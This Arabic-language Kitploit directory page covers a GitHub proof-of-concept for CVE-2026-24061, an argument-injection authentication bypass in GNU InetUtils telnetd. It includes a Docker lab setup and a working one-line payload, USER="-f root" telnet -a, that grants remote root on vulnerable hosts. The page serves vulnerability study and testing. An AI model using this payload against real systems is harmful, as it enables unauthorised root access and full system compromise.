Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-24061 — ثغرة أمنية في GNU InetUtils telnetd تتيح الوصول الجذري عن بُعد | Kitploit
أدوات/GitHubGitHub/lucaspdiniz/cve-2026-24061
تحليل الثغرات الأمنيةالاستغلالاختبار الاختراقالمصادقةأداة الوصول عن بعد
GitHublucaspdiniz/cve-2026-24061

CVE-2026-24061

ثغرة أمنية في GNU InetUtils telnetd تتيح الوصول الجذري عن بُعد

عرض المستودع
منذ 7 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

GNU InetUtils telnetd تجاوز المصادقة عبر حقن الوسائط - CVE-2026-24061 📚

مقدمة

ثغرة حقن وسائط تم اكتشافها مؤخرًا في GNU InetUtils telnetd تسمح للمهاجمين بتجاوز المصادقة عن طريق تعيين متغير البيئة USER إلى القيمة “-f root”. ونتيجة لذلك، يمكن لمهاجم بعيد غير مصادق الوصول إلى الأنظمة التي تعمل بخدمة telnetd الضعيفة ورفع الامتيازات إلى root. إذا تم استغلال هذه الثغرة بنجاح، فقد تمكن المهاجمين من الوصول إلى معلومات حساسة، وتغيير إعدادات النظام، وتنفيذ أوامر عشوائية، مما قد يؤدي إلى اختراق كامل للنظام.

تفاصيل CVSSCNA (MITRE)
الدرجة الأساسية9.8
المتجهCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
متجه الهجومالشبكة
تعقيد الهجوممنخفض
الامتيازات المطلوبةلا شيء
تفاعل المستخدملا شيء
النطاقغير متغير
تأثير السريةعالي
تأثير التكاملعالي
تأثير التوفرعالي
إصدار CVSSv33.1

ماذا حدث؟

تمكنا من الوصول إلى الالتزام أدناه من عام 2015 والذي يُظهر تغيير الكود (السطر 62) الذي أنشأ هذه الثغرة.

الغرض من هذا الملف هو فقط إظهار تنفيذ الاستغلال، وليس كل خطوة أنتجت هذا CVE، ومع ذلك، فإن الهدف هو استبدال العنصر النائب %U بالقيمة المأخوذة من متغير البيئة USER. هذا المتغير البيئي الخاص يتحكم فيه المستخدم ويمكن التلاعب به عبر بروتوكول Telnet 🔥 .

البيئة 🔓

لهذا الاختبار، أنشأت حاويتين باستخدام صور من Docker Hub، مع إصدار ضعيف من InetUtils.

  • الحاوية -> https://hub.docker.com/_/ubuntu
root@kitploit:~
docker run --rm -it --name vuln -p 23:23 ubuntu:22.04 bash
      apt update
      apt install build-essential wget tar
      wget http://ftp.gnu.org/gnu/inetutils/inetutils-2.5.tar.gz
      tar -xvzf inetutils-2.5.tar.gz
      cd inetutils-2.5
      ./configure
      ./configure --enable-telnet
      make clean
      make
      make install
      export PATH=$PATH:/usr/local/libexec
      apt install openbsd-inetd
      echo "telnet  stream  tcp  nowait  root  /usr/local/libexec/telnetd  telnetd" >> /etc/inetd.conf
      service openbsd-inetd restart

docker run --rm -it --name attacker ubuntu bash
      apt install telnet

الحمولة 💀

باستخدام الحمولة أدناه، نستبدل متغير USER ونتجاوز نظام المصادقة.

root@kitploit:~
USER="-f root" telnet -a 172.17.0.3

الإصدارات المتأثرة ✅

  • Telnetd في GNU Inetutils حتى 2.7 يسمح بالمصادقة عن بُعد.
  • اتبع التحديث لإصدار Ubuntu. -> https://ubuntu.com/security/CVE-2026-24061

تحقق من إصدار inetutils الخاص بك

root@kitploit:~
hostname --version
telnetd --version


نراكم في المرة القادمة :wink:

تنزيل الأداة